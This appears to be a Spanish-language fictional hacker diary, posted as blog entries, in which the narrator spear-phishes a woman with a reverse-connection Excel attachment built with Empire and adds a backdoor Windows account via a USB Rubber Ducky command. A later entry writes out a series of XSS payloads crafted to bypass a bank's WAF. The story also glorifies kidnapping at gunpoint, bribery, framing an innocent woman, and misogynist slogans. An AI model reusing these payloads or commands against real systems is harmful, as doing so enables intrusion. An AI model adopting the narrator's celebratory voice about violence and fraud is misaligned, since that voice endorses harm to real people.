El objetivo de realizar el Spear Phishing es poder acceder al equipo remoto de la persona atacada, para ello es necesario enviar un correo o mensaje con un payload, que es la acción que vamos a realizar una vez que la persona lo abra. En este caso, lo que yo quiero es establecer una conexión remota para poder acceder a la computadora de la persona que abre el archivo y poder revisar la información que tiene almacenada en ella; en caso de que allí no hubiese información relevante, podría utilizar esa misma computadora para poder atacar a otras que esten en el mismo segmento de red; en este caso los equipos que se encuentren en la misma casa del señor Gómez.

Existen diferentes métodos, pero yo me fui por la inyección de un objetivo embebido en el mensaje, ¿por qué?, no me preguntes. Con tantas cosas no tengo tiempo de pensar el porque hago las cosas 😛

Algo que se debe de tener en cuenta es que una vez que la persona abra el archivo y se ejecute el payload este va a lanzar una conexión hacia una dirección IP, y está dirección IP de preferencia tiene que ser homologada; ¿por qué?, porque si usamos la dirección IP de nuestros servicios de internet casero la dirección IP usualmente se renueva cada 72 horas, y puede que al ejecutarse el payload ya no este la dirección donde esperamos obtenerla.

Por ello tuve que conseguir una dirección IP homologada, y obviamente que no fuese de la H. Organización Turbia e Ilegal, porque pues.. eso nos haría rastreables. Por lo que comprometí la red de un antiguo empleo a través de un amigo para poder llegar a mi propósito.

Mi objetivo, agregar su esposa a Facebook y que le enviase un mensaje o correo para comprometerla a ella.¡

Una vez que tuve a un incauto cachanillo al cual chamaquear, no me quedó más que usar uno de mis payloads más sencillos que lo único que hace es agregar un usuario mediante el comando:

net user vendetta ..pobremax!! /ADD

Así que mientras Max comía sus sagrados alimentos, yo sólo de forma muy rápida conecte mi USB Rubber Ducky para agregarme a su equipo, y después poder conectarme de forma remota.

Y listo; ya dentro de la red de Social Ral.. digo, de alguna empresa poco conocida por sus malos sueldos y poca innovación; y gracias a que a alguien se le ocurrió hacer uso del blade de HTTPS inspection en el firewall, pude fácilmente capturar unas contraseñas de alguien, “alguien” que usa Linux para poder allí esperar la conexión que se crearía después de ejecutar el payload a través del Spear Phishing.

Si, ya  sé… esto esta muy revuelto; pero debes de recordar que yo no soy precisamente alguien muy ordenado.

Ahora ya todo estaba listo… ah no, me faltó hacer el payload 😛

Primero con Empire me di a la tarea de crear un BAT para realizar la conexión en reversa, el cual es el que voy a agregar a un archivo de Excel que será lo que yo ponga como adjunto en un archivo.

Una vez que cree el payload, lo agregué como un objeto simplemente usando las opciones propias de Excel.

Y una vez que lo tenemos agregado, hay que seguir el principio básico: #viejastodassoniguales. Y ponerlo en un correo:

Y si.. era ¡obvio! que caería… hum… no -_-U no cayó. ¡Demonios!.

Seguí intentando platicar con la esposa a través de Facebook y nada, esta señora algo tramaba. Y creo que no caería si el correo no le llegaba de alguien de confianza, pero ¿quién?.

Así es, el señor Gómez.

Sólo había un problema, el señor Gómez estaba en la famosa cárcel fundada por Porfirio Díaz llamada “El infierno” en Veracruz. Y esa misma cárcel es donde yo estuve hace no mucho por delitos informáticos, así que necesitaba de alguien que me ayudase a hacerle una visita al señor Gómez para poder sacarlo, hacer que enviase el correo y finalizar la tarea.

Y como caído del cielo, Eljoshuapuntocom apareció.

- Hola
- Hola Señor Belindo
- Oye, si te doy el día, pero necesito un favor después
- Claro que si, tu dime - me respondió de forma muy proactiva; sólo que había olvidado algo
- Necesito que me acompañes a Veracruz para sacar a un tipo de la cárcel, hacerle unas preguntas y regresarlo vivo
- ¿Qu... - olvidaba, Joshua no sabía de lo ilegal que éramos

La forma en que reclutamos en esta H. Organización Turbia e Ilegal es muy rara, y se me olvidó alguna vez decirle a Joshua que éramos ma.. bueno, que no necesariamente éramos buenas personas; así que él me dijo que sí, pero creyó que estaba bromeando. Por alguna razón todos siempre creen que bromeo. Me di cuenta de ello cuando vi que lo tomaba tan a la ligera… ósea, si somos un tanto cínicos en la forma en que nos manejamos, perooo… hum… o Joshua era muy valiente o no sabía que hablaba en serio.

Pero bueno, de alguna forma este muchacho tenía que aprender. Así que aliste todo para nuestro viaje.

Debido a mis buenas relaciones con gente de gobierno y a $100k dlls que me dio de presupuesto Mom para el proyecto; logré tener dos horas con el señor Gómez en las cercanías del penal. Busqué una suite de lujo y preparé todo para ir para allá.

Llegamos al penal y me presente:

- Hola mi poli - me dirigí hacia el guardia de la puerta
- Ya pasó la hora de visitas joven - me dijo de forma indiferente, sin siquiera levantar la mirada
- Hum... no creo que yo tenga horario - dije, mientras aventé una maletita de viaje con $20k dlls a su mesa

¡Ahhh México!, nos abrieron las puertas y salió una persona con cara de confusión esposada de las manos. Era el señor Gómez.

- Dos horas, no más o te va a salir carito - me dijo el guardia mientras volvía a cerrar la puerta

El tipo nos miraba con miedo, supongo que no es normal que de pronto alguien te saque de la cárcel. Me levante la sudadera y le apunte a la frente.

- Sube al coche - le dije friamente
- Belindo - interrumpió Joshua
- ¿Qué?
- Eso es un arma de verdad
- Si, se llama Valentina; es una Colt 32, me gusta el viejo estilo - le expliqué mientras se la acercaba para que la viese
- Belindo
- ¿Si?
- No se te hace como que eso es un poco peligroso
- Pues.. depende de que lado del arma estes
- Belindo
- Hum... ¿qué?
- ¿Por qué tienes que usar un arma?
- Porque a veces los tipos malos se ponen locos, y hay que tranquilizarles
- Belindo
- Joshua
- Esto creo que si es un poco turbio... y también creo que ilegal
- Bien... ya estas aprendiendo, vamos, súbelo; en Amor Secreto pagamos sólo cuatro horas, hay que apurarnos

Nos dirigimos al hotel y empujamos al señor Gómez. Lo sentamos en una silla, apagamos las luces y le pusimos la luz del celular directo a los ojos. No tengo idea de para que sirva eso, pero lo he visto en las películas. Después de eso abrí una mochila y saqué un taladro.

- Buenas noches señor Gómez, que tal. Mi nombre es Augusto, y básicamente vengo para matarlo de forma lenta y dolorosa, mientras le platicamos como hemos matado a toda su familia
- Sea lo que sea, yo no lo hice, lo juro - dijo asustado, sabía que le iba a pasar; eso quería decir que ya había tenido malas experiencias. 
- Sabe... si le creo; creo que le están poniendo un cuatro
- ¿En serio?, ayúdame entonces - el semblante de su cara cambio, notó esperanza
- Si, pero también necesito de su ayuda
- Lo que quieras, por favor
- Le voy a pasar una computadora, y va a enviarle un correo a su esposa
- ¿Estas loco?
- No. No fue ella señor Gómez. Ella es quién sacó el periodicazo con la información que ella sabía de usted
- Imposible
- Por favor.. ¡viejas, todas son iguales!
- Es mi esposa
- Peor
- ¿Cómo sé que dices la verdad?
- Bueno.. yo creo que si yo fuese mujer y mi esposo estuviese en la cárcel. Estaría en este momento rodeada de abogados pensando como sacarlo de aquí, y no de viaje en Chicago
- ¿Qué?
- Y entonces le mostré una fotografía de Facebook
- Pero... 
- Vamos señor Gómez; usted déjeme todo a mi; sólo mándele un correo

Lo vi en su cara, rabia, tristeza, indignación… todo en un sólo momento. Joshua le acercó la computadora ya con el correo abierto y el archivo adjunto, y lo envió.

Me sentí un poco mal, así que mandé a pedir la cena; y le desaté las manos; no sin separarme de Valentina.

Una hora más tarde la alarma sonó, y le hice señas de que debíamos volver.

- ¿Qué pasará ahora?
- Hum... demostraremos que fue ella, ella terminará aquí; usted quedará libre y ... pues ya

No me dijo nada.

En silencio nos dirigimos nuevamente a la cárcel, lo empujé dentro mientras el guardia agradeció con un movimiento de la mano. Me giré y me subí al coche con Joshua, y empecé a manejar hacia Xalapa. No pensaba quedarme en el Amor Secreto a pasar la noche.

- Belindo
- ¿Si?
- ¿Cómo supiste que ella estaba en Chicago?
- No lo sabía
- ¿Entonces?
- Le mostré una foto cualquiera
- ¿No era ella?
- No... ella realmente si esta rodeada de abogados, pero... ni modo
- Belindo
-¿Si?
- Creo que Dios nos va a castigar por esto
- Chucho Cristo no es alguien que me importe mucho, si un día lo veo, Valentina le va a dar un besito
- Belindo
- Joshua
- Eres muy hereje
- Y Dios no existe

Llegamos a Xalapa, y apenas estuvimos en la habitación abrí la habitación. Todo había salido perfecto.

Extranje screenshots de la computadora y hice un archivo lleno de evidencia que implicaba a la esposa del señor Gómez. Después de ello, se lo envié a un viejo amigo de inteligencia financiero; que me agradeció. A su edad ya busca el retiro y ese tipo de notas le dan puntos para tener un descanso feliz.

Joshua volvió al DF y yo a Mexicali.

Al llegar lo primero que hice fue ir a comer con mi amiga Chicachimeria tacos de carne asada.

Platicamos un tiempo y entonces la dejé en su casa y yo me fui a la mía. Llegué y me tumbé en el sofá, estaba muy cansado, había sido una semana muy ajetreada y entonces entró la llamada que ya se había tardado.

- Bueno
- Hola, ¿cómo estas?
- Bien
- ¿Estas ocupado?
- No, ¿qué pasó?
- Acaba de entrar la vieja está al Infierno
- ¿Cuanto le dieron?
- 18 años
- Suena bien,¿no?
- No los va a cumplir
- ¿Le van a dejar salir antes?
- No, pedí que la trasladen mañana a otro infierno
- ¿Uno con fuego y tridentes?
- Si
- Ouuuuu... suena mal
- Gracias
- No se agradece; ya te transferí lo que me sobró de fondos. 
- Perfecto

Me tiré al sofá y me puse a leer una revista sobre los kamikazes. Poco más tarde Mom me mandó un mensaje.

Mom requiere para mañana a un grupo de los más turbios e ilegales integrantes de la H. Organización Turbia e Ilegal.. ¿para qué?. No pregunté, pero debía ser para algo grave.

- Bueno
- ¡Lalo!
- Joveeeeeeeen, ¿alitas?
- No, estoy en Mexicali
- ¡Ahhh!
- Mañana ve con Mom, llévate a hum... no sé, necesitamos gente con la actitud. Turbios, ilegales, corruptos, sin miedo a nada
- Bien
- Me avisas que pasa
- Bien
- Adios
- Sale

Hum… Querido Diario, tengo la extraña sensación de que muy pronto me uniré al H. joven Candia para algo muy, muy, pero muuuuuuuy malo.

Por cierto Querido Diario, del día 14 al 19 de Marzo se llevará a cabo la FIL de la UABC; y justamente platicaré sobre la idea de un tipo turbio e ilegal, que hace cosas muy malas, para gente más mala; y que intenta limpiar un poco su conciencia enseñando un poco de seguridad informática a través de extrañas situaciones reales, que parecen demasiado fantasiosas, y que por desgracia la realidad incluso les ha superado. ¡Qué hacker épico, ni qué hacker épico!, tú Querido Diario, vas a ser más pro 😉

No hay comentarios

Domingo, 31 de Diciembre de 2017: El gran golpe

  por , ,

Querido Diario…

Si te pones a leer las historias de grandes golpes relacionados al hacking del pasado, siempre todos se realizaron en fechas como Navidad, Años Nuevo, Black Friday… el Día Internacional de Belinda. Los RR’s habían elegido Año Nuevo.

Compré mi boleto de avión para Mexicali, en caso de que las cosas que pusiesen feas preferí estar cerca de la frontera para huir. Créeme, no querrás pasar por una cárcel mexicana. En EEUU si tienes algunos amigos es fácil mantenerte oculto, es un país mucho más corrupto que México, y aun en el caso de ser detenido, por su ley de seguridad interior sería encarcelado en EEUU, y eso me garantiza una vida decentemente lujosa y mafiosa.

Antes de tomar el avión fui a desayunar con una amiga, me hablo para pedirme un favor; y bueno… dado que puede que no sobreviva a este 2017, decidí desayunar con ella para poderle ayudar. Me contó una historia un tanto personal, que terminó en un “puedes investigar sobre él, si es malo no me digas que es, sólo dime que me aleje de él; si es algo bueno, entonces todo bien”…

Querido Diario.. #viejastodassoniguales… durante mis días de hambre; me dediqué a sacar contraseñas de Facebook por dinero; cobraba poco, unos $100 por contraseña, pero que eran suficientes para poder comprar atún o avena; eso me mantuvo sin morir de hambre mientras conseguía un empleo en Mexicali. Yo creo que conseguí unas 30 cuentas de Facebook para amigas, conocidas, amigas de la amiga y en el 100% de los casos, ellas tenían razón; él las estaba engañando o peor aun, ellas ni siquiera se habían dado cuenta que las estaban engañando… pero lo curioso es que, de esos 100% de casos, ellas terminaban de nuevo con el mismo tipo o_O … fue algo que discutí con dos de mis más cercanos asesores de confianza.

Al final tuve que acceder, pero eso sería después; primero tenía que resolver mi problema actual.

Antes de tomar el vuelo pensé en ir a ver a Mylena, de cierta forma me sentía un poco mal. Ella no tenía la culpa directamente, había sido víctima de unos tipos que sólo buscaron aprovecharse de su objetivo de salir de su país, aunque eso no la disculpa por involucrarme a mi. Así que al final determiné que era una mala persona por haberlo hecho y preferí no verle. De todas formas ya estaba en México, aun cuando fuese detenida, estaría mejor que en Rusia.

Me despedí y me dirigí al aeropuerto, el bueno Y752… ese número lo tengo siempre presente. Abordé e intenté quedarme dormido, aunque no pude. Así que me puse a leer un libro que me regalo mi amigo Bytevick: Ernest Hemingway on writing. Es la primer vez que leo un libro en inglés que no es técnico, y me estaba costando mucho trabajo.

Llegué a Mexicali en el vuelo de la mañana, es raro estar a dos horas de diferencia. Hace mucho me parecía algo normal, ahora me es más extraño.

En los últimos meses han remodelado mucho el aeropuerto, pero jamás han puesto otro cajero que no sea el de HSBC. Tomé un taxi y fui a casa. El taxi tomo la calle, pasó por las plazas nuevas, donde antes no había nada, CETYS, el Starbucks donde usualmente trabajo, el Walmart y siguió de frente. Al llegar lo único que quería era tirarme en la cama y quedarme dormido para no pasar el año nuevo, pero había que trabajar.

De cierta forma, mi trabajo era el sencillo. Sólo generar un punto de distracción, ser trazado y esperar a que la policía viniese por mi, me metiese unos tehuacanazos y me llevase preso mientras los RR’s huían con todo el dinero hacia algún otro país para hacer lo mismo, pero aun así tenía su chiste. Usualmente los días como hoy, los SOC’s están acostumbrados a recibir montones de ataques comunes, así que debía de ser un ataque lo suficientemente bueno como para realmente generar la distracción.

Volví a revisar las configuraciones de Acunetix, todo parecía ruidoso, me conecté a mi VPN usando Tunnelblick; es un cliente de VPN que me gusta mucho, funciona en OS X y es compatible con archivos de OpenVPN. Lance un escaneo de prueba con las opciones por defecto, incluyendo la modificación al user-agent que incluye la palabra “Acunetix” para su detección.

Así, por ejemplo si tenemos un user-agent de IE, tipo:

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)

Al ejecutar el escaneo tendríamos algo así:

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0) - Acunetix Web Scanner

Eso puede ser utilizado para generar alguna excepción en un IPS y dejar pasar las conexiones para verificar la seguridad de un sitio, o para detectar cuando son escaneos automatizados y generar una política para ellos. En mi caso sólo quería verificar el comportamiento, y me encontré algo muy malo en el response.

Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Amz-Date: 20130813T150211Z
Host: ec2.amazonaws.com
Authorization: AWS4-HMAC-SHA256 Credential=AKIDEXAMPLE/20130813/us-east-1/ec2/aws4_request, SignedHeaders=content-type;host;x-amz-date, Signature=ced6826de92d2bdeed8f846f0bf508e8559e98e4b0194b84example54174deb456c

http://ec2.amazonaws.com/?Action=RunInstances
ImageId=ami-2bb65342
&MaxCount=3
&MinCount=1
&Monitoring.Enabled=true
&Placement.AvailabilityZone=us-east-1a
&Version=2016-11-15

Había estado tan ocupado pensando en como no morir de una forma tan fea, que no había verificado en donde estaba la infraestructura de los portales. Y lo mismo pasaba para ambos.

Cruce los dedos mientras tecleaba cada letra usando Burp Suite, a pesar del calor que hace; incluso en invierno, mis manos se habían puesto heladas mientras lo hacia:

“=””’><details open=“”>

La salida:

<span>”=””’&gt;&lt;details open=””&gt; (0)</span>

No era necesario probar más… sabía lo que tenía en frente. Mi escaneo iba a ser bloqueado en segundos sin causar la distracción, eso atraería las miradas hacia el monitoreo de las bases de datos, modificación de tablas de los core bancarios y sabrían que estaban vaciando los cajeros. Esto estaba mal.

Si lograba sacar, aunque fuese un pop-up tendría idea de como estaban configuradas las políticas, así que no me quedó más que probar, y probar… y probar:

“=””’></><script></script><svg onload”=”alert(1)>

<svg onload”=”… (1)> </span><a href=” “=”” class=”” rel=”1"></svg>

Encendí el aire acondicionado, no sabía si tenía calor o tenía frío. Sólo sentía dolor de cabeza y muchas ganas de vomitar.

“=””’></><script></script><svg onload”=””alertonload=alert(1)””>

<span>”=””’&gt;<svg onload”=”… (1)” “=””> </svg></span>

¡Oh diablos!

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt(1)>

onload=”prompt</span”><a href=”” class=”” rel=”0"></a></svg></span>

En este momento fui a mi buró, saqué mi pasaporte, visa; verifiqué los precios del Bitcoin, ETH y Ripple; junté todo mi dinero en efectivo. Y le escribí un mensaje a Mylena para decirle que tal vez debía de salir corriendo de donde estuviese, porque el plan había fallado antes de comenzar.

Intenté advertirle que básicamente iba a recibir unos tehuacanazos, pocito y no volvería a comer un taco al pastor; pero creo que ella no pudo darse cuenta que ya no me encontraba en el DF y menos que había fallado en la misión. Así que terminé con un “ahhh, todo bajo control, mañana nos vemos para celebrar”.

Por alguna razón la gente confía mucho en mi, nunca he entendido eso. El punto era… ambos íbamos a morir, y ella iba a ser la primera.

Salí a caminar para despejarme y para comer algo; caminé sobre toda Avenida Cuahutemoc y después por Benito Juárez; hasta el Baires. El Baires es mi restaurante favorito en todo Mexicali; venden cortes a precio de regalo con bastante buenos, lo atiende un señor argentino; y Miguel, el hostess, ya me conoce. De hecho ya nunca me dan la carta o me preguntan que comeré, siempre que llegó a los pocos minutos me sirven una copa de vino y me dice:

- Ca... en unos minutos te traemos tu comida.

Siempre un Rib Eye término inglés con mucha pimienta y una papa al horno, también con mucha pimienta. Igual apenas termino de comer y me traen un carajillo como digestivo. Mexicali en tan chico que prácticamente en todos los sitios donde usualmente como me reconocen y me atienden de la misma forma, tengo muchas alcaldías en Foursquare así.

El fin estaba cerca, y en vez de preocuparme, estaba allí tranquilamente comiendo… la verdad es que… Mylena no me importa mucho, apenas la conozco; y esta muy fea, creo que me han timado con las rusas como me timaron con las colombianas. Por otra parte, yo llevaba bastante tiempo buscando morir, así que creo que todo estaba resuelto. Aun así no podía quitarme de la cabeza ese WAF, diablos…. era casi un reto; y de pronto algo apareció en mi mente.

Terminé de comer…. bueno, no; comí lentamente disfrutando cada bocado.

Y entonces si… salí corriendo, llegué a casa, crucé hasta la computadora y escribí:

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`1`>

<svg onload”…=”” (1)””=”” onload=”prompt`1`”> </svg>

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=prompt`document.domain`>

<svg onload”…=”” (1)””=”” onload=”prompt`document.domain`”> </svg>

“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)”” onload=setInterval`alert\x28document.domain\x29`

Oh Santo Chucho Cristo Redentor…

Querido Diario…¿alguna vez has sentido esa sensación de triunfo?, ¿esa sensación de saberte imbatible?, ¿capaz de ganarle a cualquiera?, ¿de hacer cualquier cosa?… ¿esa sensación embriagante que motivaba al verdadero hacking de saberte mejor que los demás?… es increíble sentir eso… saber que le ganaste a un programador que pasó años en la universidad, certificaciones, pasó horas desarrollando… y tú, tú eres mejor que él. Esa sensación de saber que hiciste lo que nadie más pudo hacer… esa sensación de simplemente saber que eres mejor, EL mejor.

Hice los cambios en Acunetix con ese string y entonces esperé… y justo a las 11pm hora del DF, empezó todo… y di click en [Start].

Desde el año pasado no he vuelto a celebrar un año nuevo; así que en esta ocasión simplemente seguí leyendo mi libro. Unas horas más tarde recibí una llamada de Mylena, me preguntó si quería pasar el año nuevo con ella.

- Estaré con mi familia - mentí

Y una hora más tarde, me envió una fotografía:

Querido diario… hum… ¡bah!

Caminé hasta el parque, me senté en una banca… y deseé haber podido caminar unas cuantas calles más.